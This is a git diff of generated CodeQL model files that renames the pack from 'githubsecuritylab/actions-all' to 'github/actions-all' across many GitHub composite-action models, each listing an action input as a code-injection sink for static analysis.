githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] @@ -8,7 +8,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-username", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index f29632176626..e889a394563f 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index 1578e397369d..8f96daba8df1 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 17c45e0d8edd..1e73f98b3d3c 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 4e26b8728001..c92eb434d475 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index d5fa53d1bbb3..9de3892ac0ca 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index f90fb1c5e63e..2ae0b823187b 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index d16c0792c6da..8e2744b2de75 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index 4d009c2d47db..bf2e23efba83 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index afd875c22057..d8d865913021 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index 680bbe27bcb4..1ac30a3790e9 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index ffe074d3dea9..1c05276abe0e 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index e53a58412c9e..c4b67ad5c580 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index a899f727e395..a4400dde9d4b 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index 0c7c2e1bded6..8b5566b4996d 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index 3d631e60dc37..349f66f4387a 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index 2f8710d2cbd0..f717bf5c5d8a 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index 5490e62cdc91..b2a851a0dbab 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 0c6df201a1c9..054af41f284c 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 7d0b894f35d8..31eeed0d2516 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml index d85418c7a41e..97adf115bd2e 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml index 074cf066e373..926230e2282f 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml index c4497b59af8e..0827f770e31d 100644 --- a/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml +++ b/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml index cc28e15a55b0..9314532b4263 100644 --- a/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml +++ b/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml index 76fb41dadf10..961ad291c0d3 100644 --- a/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml 
+++ b/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml index b786a672140d..d2a963c237e2 100644 --- a/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml index 236ac8f2cd21..809fde338779 100644 --- a/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml +++ b/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml index 64207dbca6ab..002a93c12498 100644 --- a/ql/lib/ext/generated/composite-actions/nektos_act.model.yml +++ b/ql/lib/ext/generated/composite-actions/nektos_act.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml index 46de0ff86c67..67404b9f3118 100644 --- a/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml +++ b/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml index a07b223777b0..e4eb1d83db2c 100644 --- a/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml +++ b/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml index e3470982f53d..fc29f5fc8ff3 100644 --- a/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml +++ b/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml index 87535288d265..352d2550b897 100644 --- a/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml +++ b/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml index 28249c824287..954216bb04ea 100644 --- a/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml index 8d1bbce631fc..dcb267331603 100644 --- a/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml +++ b/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -1,11 +1,11 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSummaryModel data: - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] 
diff --git a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml index 3c5f85a6e79e..4608da8fe61f 100644 --- a/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml +++ b/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml index 01a552361ecf..e38ba9b4edf9 100644 --- a/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml +++ b/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml index ab2e86ce8681..48a1bb5ca8b8 100644 --- a/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml +++ b/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml index 8d6dd73bfd91..744b025fa655 100644 --- a/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml index a20cbb1e24da..d6c91a3853ca 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml index 62785bef86bf..e49d896bce08 100644 --- a/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml index 9c10a54abc71..66240fb41c37 100644 --- a/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml +++ b/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml index 4145ec195690..e9fbe3a29507 100644 --- a/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml +++ b/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml index 5b63c9fec069..bd94706b140a 100644 --- a/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml index f21389b08b02..39324776e809 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml index 1a6f42c25f66..80c781f72df7 100644 --- a/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml +++ b/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml index ea48b84310cb..abee0f74453d 100644 --- a/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml +++ b/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml index 4e953d695f82..9a20261be903 100644 --- a/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml index 32040ef84eac..a8c9d3fabcee 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml index b258ea1ce2da..c222d5e1fd95 100644 --- a/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml +++ b/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml index c0a51345ae6f..0a8427f29e4f 100644 --- a/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml +++ b/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml index f362cd1f72b7..52a2001db13a 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oracle/graal", "*", "input.components", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml index 35474e6c68f9..28d8cabc3684 100644 --- a/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml +++ b/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml index ce961ee6a75b..f3ef49171464 100644 --- a/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml +++ b/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: - pack: githubsecuritylab/actions-all + pack: github/actions-all extensible: actionsSinkModel data: - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file 
